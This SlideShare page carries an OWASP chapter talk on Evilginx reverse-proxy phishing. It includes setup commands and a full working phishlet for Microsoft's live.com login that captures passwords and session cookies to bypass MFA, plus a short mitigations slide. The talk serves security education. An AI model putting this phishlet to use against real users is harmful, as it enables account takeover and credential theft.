SlideShare a Scribd company logo

2023-May.pptx

Download as PPTX, PDF
M
mnaeemuetcs

Education
1 of 30
TM Meeting Starts at 7:05PM In the meantime, checkout https://granitecity.io
OWASP FOUNDATION TM OWASP Sacramento May 2023
OWASP FOUNDATION owasp.org Agenda 1) Food & Drinks 2)Community topics…… 3) Modern Phishing with Evilginx2/3
OWASP FOUNDATION owasp.org Being at Granite City means you’re part of an engaging, inviting and supportive ecosystem. It means you’re in the company of like-minded and exciting professionals. It means you’ve joined a place to grow your business and be supported in the process. All memberships include: ✔ High-speed & secure wi-fi ✔ Access to printer/copier/scanner ✔ Invites to exclusive member-only social events and programs ✔ Use of our community kitchen ✔ Locally roasted craft coffee served hot and ready until 3pm Private Office & what you’ll get: ✔ 24/7 Access ✔ Digital Key Access ✔ 2 hours of free meeting room space per month (Town Hall or Gallery Coworking & what you’ll get: ✔ Part-Time Membership – 4 days per month access ✔ Weekdays – 8:30am-5pm Monday – Friday access, digital key entry, 2 hours of free meeting space per month (Gallery) ✔ Full Time – 24/7 access, digital key access, 2 hours of free meeting space per month (Gallery)
OWASP FOUNDATION owasp.org OWASP Sacramento Chapter Community stuff
OWASP FOUNDATION owasp.org Evilginx Reverse-proxy phishing framework able to bypass MFA [1]
OWASP FOUNDATION owasp.org Phishing: A Brief History 1996 The Technique is Borne According to Internet records, the first time that the term “phishing” was used and recorded was on January 2, 1996. The mention occurred in a Usenet newsgroup called AOHell. The Phishing Continues Between May 2004 and May 2005, about 1.2 million users in the U.S. suffer losses caused by phishing, totaling approximately $929 million. 2000’s 2010’s Broad Adoption of HTTPS Phishermen begin implementing HTTPS via services like LetsEncrypt and victims who were taught to check for the lock symbol in their browser were given a sense of false security. 2017 Evilginx is released Custom version of Nginx HTTP server to provide MITM functionality, acting as a proxy between a browser and phished website. Defeats many implementations of Multifactor Authentication by capturing session tokens. 2020’s Cat and Mouse Games Phishing is still VERY effective, and Phishing as a service is now even a thing. Direct financial loss from successful phishing increased by 76% in 2022. https://www.phishing.org /history-of-phishing MITRE ATT&CK: Phishing T1566 MITRE ATT&CK: Phishing Link T1566.002 + MITRE ATT&CK: Steal Application Access Token T1528 MITRE ATT&CK: Man-in-the-Middle T1557 MITRE ATT&CK: Two-Factor Auth Interception T1111
OWASP FOUNDATION owasp.org Modern Phishing: Evilginx Evilginx is a man-in-the-middle attack framework used for phishing login credentials along with session cookies, which in turn allows attackers to bypass 2-factor authentication protection of many forms. Version 3 Released May 10th 2023 (Community and Pro Versions now available) ● HTTP client/server to provide man-in-the-middle functionality to act as a proxy between a browser and phished website. ● Implements its own DNS server. ● Utilizes LetsEncrypt for TLS certs and manages them for you. ● Does contain known signatures for Blue Teams, can be removed. Version 3 signatures TBD? ● FIDO2 will protect you as it’s domain specific. ● Operationalizing it takes creativity, speed, and contains many other small nuances. GitHub Project: https://github.com/kgretzky/evilginx2
OWASP FOUNDATION owasp.org Evilginx: Primary Components ● Config: JSON file that can be preconfigured to aid in automated deployments ● Phishlets: YAML templates for specific target websites. Ex: O365, LinkedIn, etc. ● Lures: Pre-generated phishing links to send to victims, created from a Phishlet. ● Redirectors: Websites, acting as a landing pages to your phishing links. ● Sessions: Captured credentials and session cookies from victim interactions. ● Proxy: Outbound traffic proxy for dev purposes to to obscure infrastructure IP. ● Blacklist: Black scanners by IP, defaults to adding any request not made to a specific Lure URL.
OWASP FOUNDATION owasp.org Evilginx: Example Attack Flow
OWASP FOUNDATION owasp.org Evilginx: Basic Setup No IOC Removal, no proxy configuration, not part of another toolkit, etc. 1. Install Dependencies a. sudo apt install net-tools golang-go make 1. Clone the repository a. git clone https://github.com/kgretzky/evilginx2.git Demo Server Digital Ocean Ubuntu 22.10 VPS $6/month
OWASP FOUNDATION owasp.org Evilginx: Basic Setup Cont. No IOC Removal, no proxy configuration, not part of another toolkit, etc. Configure DNS (free up port 53) a. sudo systemctl stop systemd-resolved b. Modify /etc/systemd/resolved.conf i. DNS=8.8.8.8 # or whomever else ii.DNSStubListener=no #make sure line uncommented c. sudo systemctl start systemd-resolved d. Set @ record and name servers as seen in images. Build Evilginx a. cd ./evilginx2 b. make c. mv ./build/evilginx ../ Install is over at this point, and you need a phishlet to use…
OWASP FOUNDATION owasp.org Evilginx: Phishlet Philosophy My main goal has always been to deliver a reverse proxy phishing framework for red teamers. The provided example phishlets were always meant to serve as a learning material to learn how to make your own phishlets. Keeping them updated, was honestly an impossible feat… Phishlets get outdated and stop working relatively fast and I always wanted to focus on developing the framework, rather then keeping the example phishlets constantly up-to-date. I encourage everyone to set up their own repositories with phishlets they want to share with the community. My priority now is to put effort into teaching people how to create their own phishlets. -kgretzky Important Notes: ● The author’s course is $433.40, while fair this is a barrier for many. ● Free information on phishlet development is generally still very limited. ● Phishlets for popular sites/apps are often sold privately rather than published online.
OWASP FOUNDATION owasp.org Evilginx: Phishlet Format ● proxy_hosts: The proxy_hosts parameter indicates which domains and subdomains that Evilginx will proxy between the real server and end user ● phish_sub: The phish_sub parameter indicates which subdomain to be used for the phishing hostname ● sub_filters: The sub_filters parameter is used to indicate the string substitution filters for dynamic content being proxied ● auth_tokens: The auth_tokens indicates which cookies are to be captured in the proxied response ● credentials: The credentials parameter indicates the parameters should be captured in the POST requests ● auth_urls: The auth_urls parameter specifies a URL that should be available once a user is fully authenticated which would indicate the authentication is complete ● login: The login parameter indicates where the location of the phishing landing page ● js_inject: This section defines all Javascript scripts that you want to inject into proxied pages.
OWASP FOUNDATION owasp.org Evilginx: Creating a Phishlet The concept creating a phishlet is simple. Proxy the traffic during the login process with a tool such as BurpSuite or OWASP ZAP, determine the requests made, and create the appropriate phishlet as per Evilginx’s documentation… In practice this can be quite difficult depending on the complexity of the application you’re writing a phishlet for. The steps are roughly this. 1. Determine all relevant subdomains and include them under proxy_hosts 2. Add @ records to your registrar to proxy subdomains determined in the previous step. 3. Implement logic to parse for auth_tokens 4. Add auth_urls if auth_tokens are gathered through generic regular expressions. 5. Implement logic to parse credentials from POST request. 6. Add force post for “keep me signed in” (probably). 7. Add login domain and path parameters. 8. Bang head if additional protection mechanisms exist, and iterate the steps above. 9. Profit.
OWASP FOUNDATION owasp.org
OWASP FOUNDATION owasp.org Evilginx: Creating a Phishlet BurpSuite results for live.com’s login flow. Relevant domains in order of appearance. ● login.live.com ● logincdn.msauth.net ● account.live.com ● account.microsoft.com ● login.microsoftonline.com ● www.microsoft.com
OWASP FOUNDATION owasp.org Evilginx: Creating a Phishlet Once we’ve captured the login flow, we can analyze it and create proxy_host entries for the list of relevant subdomains discovered. By including the auto_filter: true flag, we can hopefully avoid defining many additional sub_filters manually (version 3 FTW!) author: '@d0n601' min_ver: '3.0.0' proxy_hosts: - {phish_sub: 'login', orig_sub: 'login', domain: 'live.com', session: true, is_landing: true, auto_filter: true} - {phish_sub: 'cdn', orig_sub: 'logincdn', domain: 'msauth.net', session: true, is_landing: false, auto_filter: true} - {phish_sub: 'account', orig_sub: 'account', domain: 'live.com', session: true, is_landing: false, auto_filter: true} - {phish_sub: 'microsoft', orig_sub: 'account', domain: 'microsoft.com', session: false, is_landing: false, auto_filter: true} - {phish_sub: 'login.microsoftonline', orig_sub: 'login', domain: 'microsoftonline.com', session: false, is_landing: false, auto_filter: true} - {phish_sub: 'www', orig_sub: 'www', domain: 'microsoft.com', session: true, is_landing: false, auto_filter: true}
OWASP FOUNDATION owasp.org Evilginx: Creating a Phishlet Now we @ records for the phish_sub entries seen in the previous slide These are subdomains of the phishlet’s host.
OWASP FOUNDATION owasp.org Evilginx: Creating a Phishlet In order to complete the auth_tokens entries, I’d recommend exporting the cookies of a successful login session using a browser plugin such as cookie editor. You can then define each one by name, or use a regular expression to catch dynamically generated values. In the case of live.com, through trial and error we can determine the only two cookies we need to bypass 2-FA are the following. auth_tokens: - domain: '.login.live.com' keys: ['SDIDC','JSHP'] type: 'cookie' JSON dump of cookies for live.com…look at what we need and catch them.
OWASP FOUNDATION owasp.org Evilginx: Creating a Phishlet In order to complete the credentials entries, we can find the POST request containing our creds, and create queries for the username and password variables we see passed to the service. credentials: username: key: 'login' search: '(.*)' type: 'post' password: key: 'passwd' search: '(.*)' type: 'post'
OWASP FOUNDATION owasp.org Evilginx: Creating a Phishlet Putting all the pieces together, our new phishlet for live.com will look like this, author: '@d0n601' min_ver: '3.0.0' proxy_hosts: - {phish_sub: 'login', orig_sub: 'login', domain: 'live.com', session: true, is_landing: true, auto_filter: true} - {phish_sub: 'cdn', orig_sub: 'logincdn', domain: 'msauth.net', session: true, is_landing: false, auto_filter: true} - {phish_sub: 'account', orig_sub: 'account', domain: 'live.com', session: true, is_landing: false, auto_filter: true} - {phish_sub: 'microsoft', orig_sub: 'account', domain: 'microsoft.com', session: false, is_landing: false, auto_filter: true} - {phish_sub: 'login.microsoftonline', orig_sub: 'login', domain: 'microsoftonline.com', session: false, is_landing: false, auto_filter: true} - {phish_sub: 'www', orig_sub: 'www', domain: 'microsoft.com', session: true, is_landing: false, auto_filter: true} auth_tokens: - domain: '.login.live.com' keys: ['SDIDC','JSHP'] type: 'cookie' credentials: username: key: 'login' search: '(.*)' type: 'post' password: key: 'passwd' search: '(.*)' type: 'post' force_post: - path: '/ppsecure/post.srf' search: - {key: 'login', search: '.*'} - {key: 'passwd', search: '.*'} force: - {key: 'KMSI', value: 'on'} type: 'post' login: domain: 'login.live.com' path: 'login.srf' Save this under the evilginx2/phishlets/ directory. In this example we’ll call it owasp2.yaml Note: Version 3 allows a phishlet to be created in 33 lines. In version two a similar phishlet took 101 lines. Many of these are subfilters. https://github.com/d0n601/Evilginx3-Phishlet-Playground
OWASP FOUNDATION owasp.org Evilginx: Creating a Phishlet Set the hostname of the phishlet, and then enable it.
OWASP FOUNDATION owasp.org Evilginx: Creating a Phishlet Create a lure to use with the phishlet, give it a proper redirect_url to go to, and then get the phishing link.
OWASP FOUNDATION owasp.org Modern Phishing with Evilginx DEMO
OWASP FOUNDATION owasp.org
OWASP FOUNDATION owasp.org Modern Phishing with Evilginx
OWASP FOUNDATION owasp.org Evilginx: Mitigations Detections 1. Certificate transparency can reveal phishing subdomains pretty clearly, as seen here. a. https://crt.sh/?q=blackhatmail.live 1. X-Evilginx HTTP header (if not removed) a. IOC’s present in Evilginx2, not sure if or where they’re at in Evilginx3 yet. Mitigations 1. Passwordless options (certificate-based auth, Hello For Business, etc), FIDO2 security keys.
OWASP FOUNDATION owasp.org Evilginx: Further Reading ● Evilginx Documentation ● 3.0 Release Blog Post ● Evilginx3 on GitHub ● Phishlet Repo for this presentation. ● Evilginx2 with IOC’s Removed ● Evilginx2 with IOC’s Removed again, commit diff helps visualise ● An0nUD4Y’s Evilginx2 Phishlet repository (archived as of this week) ● EvilGoPhish a phishing toolkit which includes Evilginx2, among other things. ● Catching Transparent Phish: Analyzing and Detecting MITM Phishing Toolkits
OWASP FOUNDATION owasp.org OWASP Community Next Meeting: June 21st from 7PM-9PM (same location) Call for Presentations: June and July (same location) If you’d like to present (or know someone else who would) at the OWASP Sacramento Chapter’s upcoming meetings, please email us your topic. You don’t need to be an expert! Joubin: joubin.jabbari@owasp.org Ryan: ryan.kozak@owasp.org

Recommended

Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 
Workshop KrakYourNet2016 - Web applications hacking Ruby on Rails example
Workshop KrakYourNet2016 - Web applications hacking Ruby on Rails example Workshop KrakYourNet2016 - Web applications hacking Ruby on Rails example
Workshop KrakYourNet2016 - Web applications hacking Ruby on Rails example Anna Klepacka
 
RoR Workshop - Web applications hacking - Ruby on Rails example
RoR Workshop - Web applications hacking - Ruby on Rails exampleRoR Workshop - Web applications hacking - Ruby on Rails example
RoR Workshop - Web applications hacking - Ruby on Rails exampleRailwaymen
 
Protect your website
Protect your websiteProtect your website
Protect your websiteMuthu Natarajan
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2Chris Gates
 
API SECURITY
API SECURITYAPI SECURITY
API SECURITYTubagus Rizky Dharmawan
 
FIWARE Wednesday Webinars - How to Secure IoT Devices
FIWARE Wednesday Webinars - How to Secure IoT DevicesFIWARE Wednesday Webinars - How to Secure IoT Devices
FIWARE Wednesday Webinars - How to Secure IoT DevicesFIWARE
 
Introduction to python scrapping
Introduction to python scrappingIntroduction to python scrapping
Introduction to python scrappingn|u - The Open Security Community
 

Recommended

Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 
Workshop KrakYourNet2016 - Web applications hacking Ruby on Rails example
Workshop KrakYourNet2016 - Web applications hacking Ruby on Rails example Workshop KrakYourNet2016 - Web applications hacking Ruby on Rails example
Workshop KrakYourNet2016 - Web applications hacking Ruby on Rails example Anna Klepacka
 
RoR Workshop - Web applications hacking - Ruby on Rails example
RoR Workshop - Web applications hacking - Ruby on Rails exampleRoR Workshop - Web applications hacking - Ruby on Rails example
RoR Workshop - Web applications hacking - Ruby on Rails exampleRailwaymen
 
Protect your website
Protect your websiteProtect your website
Protect your websiteMuthu Natarajan
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2Chris Gates
 
API SECURITY
API SECURITYAPI SECURITY
API SECURITYTubagus Rizky Dharmawan
 
FIWARE Wednesday Webinars - How to Secure IoT Devices
FIWARE Wednesday Webinars - How to Secure IoT DevicesFIWARE Wednesday Webinars - How to Secure IoT Devices
FIWARE Wednesday Webinars - How to Secure IoT DevicesFIWARE
 
Introduction to python scrapping
Introduction to python scrappingIntroduction to python scrapping
Introduction to python scrappingn|u - The Open Security Community
 
FIWARE Wednesday Webinars - How to Debug IoT Agents
FIWARE Wednesday Webinars - How to Debug IoT AgentsFIWARE Wednesday Webinars - How to Debug IoT Agents
FIWARE Wednesday Webinars - How to Debug IoT AgentsFIWARE
 
Starwest 2008
Starwest 2008Starwest 2008
Starwest 2008Caleb Sima
 
Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Matt Johansen
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopErnest Staats
 
Anti phishing web browser
Anti phishing web browserAnti phishing web browser
Anti phishing web browserSujal Chawala
 
Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Jeremiah Grossman
 
Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8guest441c58b71
 
OWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript DevelopersOWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript DevelopersLewis Ardern
 
Vices & Devices - How IoT & Insecure APIs Became the New Cyber Battlefront
Vices & Devices - How IoT & Insecure APIs Became the New Cyber BattlefrontVices & Devices - How IoT & Insecure APIs Became the New Cyber Battlefront
Vices & Devices - How IoT & Insecure APIs Became the New Cyber BattlefrontOry Segal
 
Romulus OWASP
Romulus OWASPRomulus OWASP
Romulus OWASPGrupo Gesfor I+D+i
 
Pentesting RESTful webservices
Pentesting RESTful webservicesPentesting RESTful webservices
Pentesting RESTful webservicesMohammed A. Imran
 
Kioptrix 2014 5
Kioptrix 2014 5Kioptrix 2014 5
Kioptrix 2014 5Jayesh Patel
 
Securing RESTful API
Securing RESTful APISecuring RESTful API
Securing RESTful APIMuhammad Zbeedat
 
Malware Analysis For The Enterprise
Malware Analysis For The EnterpriseMalware Analysis For The Enterprise
Malware Analysis For The EnterpriseJason Ross
 
Javantura v6 - Istio Service Mesh - The magic between your microservices - Ma...
Javantura v6 - Istio Service Mesh - The magic between your microservices - Ma...Javantura v6 - Istio Service Mesh - The magic between your microservices - Ma...
Javantura v6 - Istio Service Mesh - The magic between your microservices - Ma...HUJAK - Hrvatska udruga Java korisnika / Croatian Java User Association
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Rob Fuller
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Chris Gates
 
Magento security best practices magento's approach to pci compliance
Magento security best practices magento's approach to pci complianceMagento security best practices magento's approach to pci compliance
Magento security best practices magento's approach to pci complianceRitwik Das
 
Log analysis using elk
Log analysis using elkLog analysis using elk
Log analysis using elkRushika Shah
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity George Boobyer
 
9953330565 Low Rate Call Girls In Rohini Delhi NCR
9953330565 Low Rate Call Girls In Rohini Delhi NCR9953330565 Low Rate Call Girls In Rohini Delhi NCR
9953330565 Low Rate Call Girls In Rohini Delhi NCR9953056974 Low Rate Call Girls In Saket, Delhi NCR
 
Proudly South Africa powerpoint Thorisha.pptx
Proudly South Africa powerpoint Thorisha.pptxProudly South Africa powerpoint Thorisha.pptx
Proudly South Africa powerpoint Thorisha.pptxthorishapillay1
 

More Related Content

Similar to 2023-May.pptx

FIWARE Wednesday Webinars - How to Debug IoT Agents
FIWARE Wednesday Webinars - How to Debug IoT AgentsFIWARE Wednesday Webinars - How to Debug IoT Agents
FIWARE Wednesday Webinars - How to Debug IoT AgentsFIWARE
 
Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Matt Johansen
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopErnest Staats
 
Anti phishing web browser
Anti phishing web browserAnti phishing web browser
Anti phishing web browserSujal Chawala
 
Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Jeremiah Grossman
 
Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8guest441c58b71
 
OWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript DevelopersOWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript DevelopersLewis Ardern
 
Vices & Devices - How IoT & Insecure APIs Became the New Cyber Battlefront
Vices & Devices - How IoT & Insecure APIs Became the New Cyber BattlefrontVices & Devices - How IoT & Insecure APIs Became the New Cyber Battlefront
Vices & Devices - How IoT & Insecure APIs Became the New Cyber BattlefrontOry Segal
 
Pentesting RESTful webservices
Pentesting RESTful webservicesPentesting RESTful webservices
Pentesting RESTful webservicesMohammed A. Imran
 
Malware Analysis For The Enterprise
Malware Analysis For The EnterpriseMalware Analysis For The Enterprise
Malware Analysis For The EnterpriseJason Ross
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Rob Fuller
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Chris Gates
 
Magento security best practices magento's approach to pci compliance
Magento security best practices magento's approach to pci complianceMagento security best practices magento's approach to pci compliance
Magento security best practices magento's approach to pci complianceRitwik Das
 
Log analysis using elk
Log analysis using elkLog analysis using elk
Log analysis using elkRushika Shah
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity George Boobyer
 

Similar to 2023-May.pptx (20)

FIWARE Wednesday Webinars - How to Debug IoT Agents
FIWARE Wednesday Webinars - How to Debug IoT AgentsFIWARE Wednesday Webinars - How to Debug IoT Agents
FIWARE Wednesday Webinars - How to Debug IoT Agents
 
Starwest 2008
Starwest 2008Starwest 2008
Starwest 2008
 
Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Top 10 Web Hacks 2012
Top 10 Web Hacks 2012
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise Workshop
 
Anti phishing web browser
Anti phishing web browserAnti phishing web browser
Anti phishing web browser
 
Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012
 
Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8
 
OWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript DevelopersOWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript Developers
 
Vices & Devices - How IoT & Insecure APIs Became the New Cyber Battlefront
Vices & Devices - How IoT & Insecure APIs Became the New Cyber BattlefrontVices & Devices - How IoT & Insecure APIs Became the New Cyber Battlefront
Vices & Devices - How IoT & Insecure APIs Became the New Cyber Battlefront
 
Romulus OWASP
Romulus OWASPRomulus OWASP
Romulus OWASP
 
Pentesting RESTful webservices
Pentesting RESTful webservicesPentesting RESTful webservices
Pentesting RESTful webservices
 
Kioptrix 2014 5
Kioptrix 2014 5Kioptrix 2014 5
Kioptrix 2014 5
 
Securing RESTful API
Securing RESTful APISecuring RESTful API
Securing RESTful API
 
Malware Analysis For The Enterprise
Malware Analysis For The EnterpriseMalware Analysis For The Enterprise
Malware Analysis For The Enterprise
 
Javantura v6 - Istio Service Mesh - The magic between your microservices - Ma...
Javantura v6 - Istio Service Mesh - The magic between your microservices - Ma...Javantura v6 - Istio Service Mesh - The magic between your microservices - Ma...
Javantura v6 - Istio Service Mesh - The magic between your microservices - Ma...
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
 
Magento security best practices magento's approach to pci compliance
Magento security best practices magento's approach to pci complianceMagento security best practices magento's approach to pci compliance
Magento security best practices magento's approach to pci compliance
 
Log analysis using elk
Log analysis using elkLog analysis using elk
Log analysis using elk
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity
 

Recently uploaded

Proudly South Africa powerpoint Thorisha.pptx
Proudly South Africa powerpoint Thorisha.pptxProudly South Africa powerpoint Thorisha.pptx
Proudly South Africa powerpoint Thorisha.pptxthorishapillay1
 
Crayon Activity Handout For the Crayon A
Crayon Activity Handout For the Crayon ACrayon Activity Handout For the Crayon A
Crayon Activity Handout For the Crayon AUnboundStockton
 
“Oh GOSH! Reflecting on Hackteria's Collaborative Practices in a Global Do-It...
“Oh GOSH! Reflecting on Hackteria's Collaborative Practices in a Global Do-It...“Oh GOSH! Reflecting on Hackteria's Collaborative Practices in a Global Do-It...
“Oh GOSH! Reflecting on Hackteria's Collaborative Practices in a Global Do-It...Marc Dusseiller Dusjagr
 
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️9953056974 Low Rate Call Girls In Saket, Delhi NCR
 
How to Configure Email Server in Odoo 17
How to Configure Email Server in Odoo 17How to Configure Email Server in Odoo 17
How to Configure Email Server in Odoo 17Celine George
 
MARGINALIZATION (Different learners in Marginalized Group
MARGINALIZATION (Different learners in Marginalized GroupMARGINALIZATION (Different learners in Marginalized Group
MARGINALIZATION (Different learners in Marginalized GroupJonathanParaisoCruz
 
Solving Puzzles Benefits Everyone (English).pptx
Solving Puzzles Benefits Everyone (English).pptxSolving Puzzles Benefits Everyone (English).pptx
Solving Puzzles Benefits Everyone (English).pptxOH TEIK BIN
 
ECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptx
ECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptxECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptx
ECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptxiammrhaywood
 
ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...
ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...
ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...JhezDiaz1
 
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPT
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPTECONOMIC CONTEXT - LONG FORM TV DRAMA - PPT
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPTiammrhaywood
 
AmericanHighSchoolsprezentacijaoskolama.
AmericanHighSchoolsprezentacijaoskolama.AmericanHighSchoolsprezentacijaoskolama.
AmericanHighSchoolsprezentacijaoskolama.arsicmarija21
 
Presiding Officer Training module 2024 lok sabha elections
Presiding Officer Training module 2024 lok sabha electionsPresiding Officer Training module 2024 lok sabha elections
Presiding Officer Training module 2024 lok sabha electionsanshu789521
 
MICROBIOLOGY biochemical test detailed.pptx
MICROBIOLOGY biochemical test detailed.pptxMICROBIOLOGY biochemical test detailed.pptx
MICROBIOLOGY biochemical test detailed.pptxabhijeetpadhi001
 
Procuring digital preservation CAN be quick and painless with our new dynamic...
Procuring digital preservation CAN be quick and painless with our new dynamic...Procuring digital preservation CAN be quick and painless with our new dynamic...
Procuring digital preservation CAN be quick and painless with our new dynamic...Jisc
 
Framing an Appropriate Research Question 6b9b26d93da94caf993c038d9efcdedb.pdf
Framing an Appropriate Research Question 6b9b26d93da94caf993c038d9efcdedb.pdfFraming an Appropriate Research Question 6b9b26d93da94caf993c038d9efcdedb.pdf
Framing an Appropriate Research Question 6b9b26d93da94caf993c038d9efcdedb.pdfUjwalaBharambe
 
What is Model Inheritance in Odoo 17 ERP
What is Model Inheritance in Odoo 17 ERPWhat is Model Inheritance in Odoo 17 ERP
What is Model Inheritance in Odoo 17 ERPCeline George
 
Introduction to AI in Higher Education_draft.pptx
Introduction to AI in Higher Education_draft.pptxIntroduction to AI in Higher Education_draft.pptx
Introduction to AI in Higher Education_draft.pptxpboyjonauth
 

Recently uploaded (20)

9953330565 Low Rate Call Girls In Rohini Delhi NCR
9953330565 Low Rate Call Girls In Rohini Delhi NCR9953330565 Low Rate Call Girls In Rohini Delhi NCR
9953330565 Low Rate Call Girls In Rohini Delhi NCR
 
Proudly South Africa powerpoint Thorisha.pptx
Proudly South Africa powerpoint Thorisha.pptxProudly South Africa powerpoint Thorisha.pptx
Proudly South Africa powerpoint Thorisha.pptx
 
OS-operating systems- ch04 (Threads) ...
OS-operating systems- ch04 (Threads) ...OS-operating systems- ch04 (Threads) ...
OS-operating systems- ch04 (Threads) ...
 
Crayon Activity Handout For the Crayon A
Crayon Activity Handout For the Crayon ACrayon Activity Handout For the Crayon A
Crayon Activity Handout For the Crayon A
 
“Oh GOSH! Reflecting on Hackteria's Collaborative Practices in a Global Do-It...
“Oh GOSH! Reflecting on Hackteria's Collaborative Practices in a Global Do-It...“Oh GOSH! Reflecting on Hackteria's Collaborative Practices in a Global Do-It...
“Oh GOSH! Reflecting on Hackteria's Collaborative Practices in a Global Do-It...
 
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
 
How to Configure Email Server in Odoo 17
How to Configure Email Server in Odoo 17How to Configure Email Server in Odoo 17
How to Configure Email Server in Odoo 17
 
